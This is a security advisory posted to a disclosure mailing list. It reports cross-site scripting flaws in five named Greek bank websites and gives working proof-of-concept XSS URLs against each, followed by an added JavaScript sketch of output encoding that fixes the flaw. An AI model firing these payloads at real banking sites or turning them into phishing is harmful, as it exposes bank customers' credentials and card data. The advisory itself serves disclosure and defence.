Message-ID: <000e01c6dc82$49595bd0$0d00a8c0@MKandias>
Date: Wed, 20 Sep 2006 09:59:15 +0300
From: "Sentinel" <info@...tinel.gr>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Cross Site Scripting at Several Greek Banks.

                      Sentinel Computer Security Advisory


Sentinel Co.
http://www.sentinel.gr
info@...tinel.gr


General Flaw Description : Cross Site Scripting Vulnerabilities in multiple
                           Greek Web Banking sites.
-------------------------------------------------------------------------------
                             Advisory Information
-------------------------------------------------------------------------------
Advisory Release Date : 2006/09/01
Advisory ID : SGA-0002
Extends : None
Deprecates : None
-------------------------------------------------------------------------------
                             Product Information
-------------------------------------------------------------------------------
Flawed File Name : http://www.eurobank.gr/online/home/pops.aspx,
                   http://www.winbank.gr/eCPage.asp,
                   http://www.emporiki.gr/cbg/gr/search/search.jsp,
                   http://www.piraeusbank.gr/ecportal.asp,
                   http://www.probank.gr/search/index.php
-------------------------------------------------------------------------------
                          Vulnerability Information
-------------------------------------------------------------------------------
Flaw Type : Cross Site Scripting
Vulnerability Impact : Phishing and Scam attacks
Vulnerability Rating : Critical
Patch Status : Partially Patched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/08/31
Patch Date : 2006/09/02
Vulnerability Credit : Emmanouil Gavriil (egavriil@...tinel.gr)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------------


Description
-----------

Many Greek banks use a Web Banking service to assist their customers with
their transactions. Eurobank, Winbank, Piraeus Bank, Probank and Emporiki Bank
were found to be vulnerable to Cross Site Scripting attacks, which can lead to
execution of arbitrary SCRIPT and HTML code in the user's browser.


Technical Information
---------------------

www.eurobank.gr makes use of multiple aspx files which fail to sanitise
variables. Most of the aspx files on the Eurobank website which take variables
as input are vulnerable to XSS.

www.winbank.gr uses a search function which does not properly sanitise the
input of the variable text_search.

www.emporiki.gr uses a jsp search function which does not properly sanitise
the input of the variable searchFld.

www.piraeusbank.gr has exactly the same problem as Winbank, as it is
actually the same bank. Even though it doesn't have a Web Banking System
itself, it forwards Web Banking requests to winbank. Cross Site Scripting
is possible, and thus the danger is the same, as an unsuspecting user can be
led from www.piraeusbank.gr with a valid redirection to a fake www.winbank.gr
login screen.

www.probank.gr doesn't have a Web Banking Service, but the site is vulnerable
to XSS, and while account compromise is not possible, valuable information such
as CARD and PIN numbers can be stolen through phishing/scam attacks.


Proof of Concept Experiment
---------------------------

http://www.eurobank.gr/online/home/pops.aspx?';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

http://www.winbank.gr/eCPage.asp?Page=eCFullSearchResults.asp&lang=1&text_search=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.emporiki.gr/cbg/gr/search/search.jsp?searchFld=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}

http://www.piraeusbank.gr/ecportal.asp?id=235212&nt=107&pageno=1&fromsearch=234010&lang=2&tid=&txtSearch=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.probank.gr/search/index.php?qu=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}


Patch Description and Information
---------------------------------

The banks were informed. All banks except Emporiki Bank have fixed the
vulnerability.


References and Other Resources for Information
----------------------------------------------

None.

EOF.
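
The unsanitised-input flaw described under Technical Information, shown as a before/after sketch of a search page that echoes its query. This is an added example, not code from the advisory or from any of the banks' sites: the function names and the page template are hypothetical, and the two probe values are decoded from the proof-of-concept URLs above.

```javascript
// Added example: context-aware output encoding for an echoed search term.
// All function names and the page template are hypothetical.

// Encode for HTML element content and quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Encode for a JavaScript string literal inside an inline <script> block.
// JSON.stringify handles double quotes and backslashes; the second pass
// rewrites characters that could end the literal or the script element.
function escapeJsString(s) {
  return JSON.stringify(String(s)).replace(/[<>&'\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// "Before": the search term is concatenated into both sinks unencoded.
function renderVulnerable(term) {
  return '<p>Results for: ' + term + '</p>\n' +
         "<script>var lastSearch = '" + term + "';</script>";
}

// "After": each sink gets the encoder that matches its context.
function renderHardened(term) {
  return '<p>Results for: ' + escapeHtml(term) + '</p>\n' +
         '<script>var lastSearch = ' + escapeJsString(term) + ';</script>';
}

// Probe values decoded from the advisory's proof-of-concept URLs.
const htmlProbe = "<script>alert('XSS')</script>";
const jsProbe = "';alert(String.fromCharCode(88,83,83))//";

// True if the probe appears byte-for-byte in the rendered markup.
function reflectedVerbatim(html, probe) {
  return html.includes(probe);
}

for (const probe of [htmlProbe, jsProbe]) {
  console.log(JSON.stringify(probe),
    '| vulnerable page reflects it:', reflectedVerbatim(renderVulnerable(probe), probe),
    '| hardened page reflects it:', reflectedVerbatim(renderHardened(probe), probe));
}
```

A verbatim-reflection check like `reflectedVerbatim` is a quick regression test for a fix, not proof that every sink on a page is encoded for its context.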
